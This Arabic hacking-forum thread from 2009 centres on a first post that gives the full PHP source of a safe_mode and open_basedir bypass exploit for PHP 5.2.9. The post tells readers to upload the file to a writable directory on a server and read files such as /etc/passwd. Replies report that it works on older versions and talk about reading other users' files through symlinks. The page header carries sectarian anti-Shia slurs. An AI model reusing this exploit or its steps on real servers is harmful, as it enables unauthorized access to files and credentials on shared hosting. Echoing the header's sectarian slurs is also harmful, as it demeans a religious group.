عالم المعرفة       - Group XP -       أهل السنه والجماعه
ضع إعلانك هنا الحوار السني الشيعي تعــــلم تشفير الباتش تشفير السيرفر فك التشفير تشفير الملفات Crypter ضع إعلانك هنا
مسابقه تشفير السيرفرات المقدم Hack.VB.NET ضع إعلانك هنا ضع إعلانك هنا ضع إعلانك هنا

فضائح الخميني ، فضائح الشيرازي ، فضائح الخوئي ، فضائح السيستاني ، فضائح حسن نصر الله ، فضائح مقتدى الصدر ، فضائح المذهب الشيعي ، فضائح الشيعة ، فضائح الرافضة ، فضائح الروافض , افلام , وصور , جرائم المجوس ضدأهل السنه , ومقالات , وتصريحات إعلامية


 
العودة   عالم المعرفة - Group XP - أهل السنه والجماعه > قسم حماية الاجهزة والسيرفرات > أمن المواقع والسيرفرات

أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز

إضافة رد
 
LinkBack أدوات الموضوع
قديم 05-05-2009, 09:22 PM   رقم المشاركة : 1 (permalink)
ahmed_100022
عضو جديد






ahmed_100022 غير متصل

ahmed_100022 will become famous soon enoughahmed_100022 will become famous soon enough

Talking تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

السلام عليكم ورحمة الله وبركاته

أول موضوع لى بالمنتدى وهو تخطى السيف مود فى أكثر السيرفرات

أدخل على ملف مصرح (مسموح انك ترفع بيه ملفات)

واصنع ملف بى اتش بى جديد

وضع فيه الكود هذا

كود:
<?php
/*
safe_mode and open_basedir Bypass PHP 5.2.9
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

NOTE:
http://securityreason.com/achievement_securityalert/61

EXPLOIT:
http://securityreason.com/achievement_exploitalert/10
*/

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];

echo '<PRE><P>This is exploit from <a
href="http://securityreason.com/" title="SecurityAudit">Security Audit - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.9 safe_mode & open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"]).$_SERVER["PHP_SELF"].'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form>';


$level=0;

if(!file_exists("file:"))
	mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
	if(!empty($hardstyle[$a])){
		if(!file_exists($hardstyle[$a])) 
			mkdir($hardstyle[$a]);
		chdir($hardstyle[$a]);
		$level++;
	}
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';

if(FALSE==curl_exec($ch))
	die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' </textarea> </FONT>';

curl_close($ch);

?>
وافتحه بالمتصفح واقرا ايى ملف بالطريقه دى

/etc/passwd

مثلا
أتمنى الموضوع يكون بسيط

السلام عليكم,






 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 05-06-2009, 07:39 AM   رقم المشاركة : 2 (permalink)
sec-root

:: ALM3r3fh GRoup::
 
الصورة الرمزية sec-root







sec-root غير متصل

sec-root will become famous soon enoughsec-root will become famous soon enough

افتراضي رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

بارك الله فيك شرح واضح ,والثغره خاصه ب5.2.9 php







 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 05-06-2009, 08:44 PM   رقم المشاركة : 3 (permalink)
ahmed_100022
عضو جديد






ahmed_100022 غير متصل

ahmed_100022 will become famous soon enoughahmed_100022 will become famous soon enough

افتراضي رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

شكرا على ردك أخى

وتم تجربة الثغره على اصدارات قبل 5.2.9

واشتغلت بنجاح







 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 05-07-2009, 01:43 AM   رقم المشاركة : 4 (permalink)
aSSaSSin_HaCkErS
عضو نشيط






aSSaSSin_HaCkErS غير متصل

aSSaSSin_HaCkErS will become famous soon enoughaSSaSSin_HaCkErS will become famous soon enough

افتراضي رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

جزاك الله خير اخي العزيز
جاري التجربه







التوقيع

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 05-07-2009, 05:07 AM   رقم المشاركة : 5 (permalink)
SnIpEr_H

" Group XP "
 
الصورة الرمزية SnIpEr_H







SnIpEr_H غير متصل

SnIpEr_H has a spectacular aura aboutSnIpEr_H has a spectacular aura aboutSnIpEr_H has a spectacular aura about

افتراضي رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

يعطيك العافيه اخوي بالنسبه لي قراءة ملف etc/passwd فيه عدة طرق

لكن المشكله في تخطى صلاحيات اليوزر وقراءة ملفات php على مساحه اخرى

وتشغيل البيرل برضه يعتبر تخطي للسيف مود وتقدر تقراء ملجد passwd







التوقيع

اسـتــغــفـــر الله الــعـــظـــيـم

SEC.SSH@GmAiL.CoM

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 05-08-2009, 04:45 AM   رقم المشاركة : 6 (permalink)
ly_6615
عضو جديد






ly_6615 غير متصل

ly_6615 will become famous soon enoughly_6615 will become famous soon enough

افتراضي رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

مشكور اخى

جارى الاطلاع







 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 05-08-2009, 08:54 PM   رقم المشاركة : 7 (permalink)
ahmed_100022
عضو جديد






ahmed_100022 غير متصل

ahmed_100022 will become famous soon enoughahmed_100022 will become famous soon enough

افتراضي رد: تخطى السيف مود فى أكثر السيرفرات بنسبة كبيره جدا

مشكورين اخوانى على ردودكم
وانشاء الله تنفع الطريقه

اقتباس:
المشاركة الأصلية كتبت بواسطة SnIpEr_h مشاهدة المشاركة
يعطيك العافيه اخوي بالنسبه لي قراءة ملف etc/passwd فيه عدة طرق

لكن المشكله في تخطى صلاحيات اليوزر وقراءة ملفات php على مساحه اخرى

وتشغيل البيرل برضه يعتبر تخطي للسيف مود وتقدر تقراء ملجد passwd
بالنسبه لقرائة ملفات بى اتش بى يمكنك استخدام السيم لينك مثلا
وياريت لو فيه طريقه تشغل البيرل والوضع الامن فعال ومفيش معايا باسوورد السى بانل تقولها

لانى فعلا محتاجها






 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
سلسلة دروس اختراق السيرفرات وحل مشاكل المخترقين بعنوان i am rooting , watch me Sniper Code [ Videos] 14 08-17-2010 12:13 PM


الساعة الآن 12:02 AM.


روابط مهمة

أقسام المنتدى



Powered by vBulletin Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة